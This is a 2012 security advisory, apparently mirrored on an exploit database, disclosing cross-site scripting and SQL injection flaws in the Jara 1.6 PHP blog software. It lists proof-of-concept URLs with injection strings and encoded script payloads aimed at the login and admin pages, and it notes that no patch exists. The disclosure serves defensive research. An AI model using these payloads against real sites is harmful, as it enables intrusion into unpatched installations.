Jara 1.6 Cross Site Scripting / SQL Injection Vulnerabilities

2012-10-21T00:00:00
ID 1337DAY-ID-19680
Type zdt
Reporter Canberk BOLAT
Modified 2012-10-21T00:00:00

Description

Jara version 1.6 suffers from cross site scripting and remote SQL injection vulnerabilities.

                                        
                                            Information
--------------------
Name :  XSS and SQL Injection Vulnerabilities in Jara
Software :  Jara 1.6 and possibly below.
Vendor Homepage :  http://sourceforge.net/projects/jara/
Vulnerability Type :  Cross-Site Scripting and SQL Injection
Severity :  Critical
Researcher :  Canberk Bolat
Advisory Reference :  NS-12-009

Description
--------------------
An open source simple blog utilising the features of PHP 5 and MySQL
5. Supports multiple writers, categories, managing posts, static
content pages and post comments as well as providing an intuitive
administration panel.

Details
--------------------
Jara is affected by XSS and SQL Injection vulnerabilities in version 1.6.

Example PoC urls are as follows :

SQL Injection Vulnerabilities
http://example.com/login.php (POST - username)
http://example.com/login.php (POST - password)
http://example.com/admin/delete_page.php?id='%2BNSFTW%2B'
http://example.com/admin/delete_post.php?id='%2BNSFTW%2B'
http://example.com/admin/delete_category.php?id='%2BNSFTW%2B'
http://example.com/admin/delete_user.php?id='%2BNSFTW%2B'
http://example.com/admin/edit_page.php?id='%2BNSFTW%2B'
http://example.com/admin/edit_user.php?id='%2BNSFTW%2B'
http://example.com/admin/edit_post.php (POST - id)
http://example.com/admin/edit_category.php (POST - id)

XSS Vulnerabilities
http://example.com/view.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0031F8)%3C/script%3E
http://example.com/page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003214)%3C/script%3E
http://example.com/category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0032D5)%3C/script%3E
http://example.com/login.php (POST - username)
http://example.com/login.php (POST - password)
http://example.com/admin/delete_page.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E
http://example.com/admin/delete_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003548)%3C/script%3E
http://example.com/admin/delete_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034CE)%3C/script%3E
http://example.com/admin/delete_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E
http://example.com/admin/edit_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034D5)%3C/script%3E
http://example.com/admin/edit_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003542)%3C/script%3E
http://example.com/admin/edit_page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003569)%3C/script%3E
http://example.com/admin/edit_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E


You can read the full article about Cross-Site Scripting and SQL
Injection vulnerabilities from here :

Cross-site Scripting: http://www.mavitunasecurity.com/crosssite-scripting-xss/
SQL Injection: http://www.mavitunasecurity.com/sql-injection/

Solution
--------------------
No patch released.

Advisory Timeline
--------------------
19/11/2011 - Couldn’t found a contact e-mail
22/08/2012 - Vulnerability Released

Credits
--------------------
It has been discovered on testing of Netsparker, Web Application
Security Scanner - http://www.mavitunasecurity.com/netsparker/.

References
--------------------
MSL Advisory Link :
http://www.mavitunasecurity.com/xss-and-sql-injection-vulnerabilities-in-jara/
Netsparker Advisories : http://www.mavitunasecurity.com/netsparker-advisories/

#  0day.today [2018-03-06]  #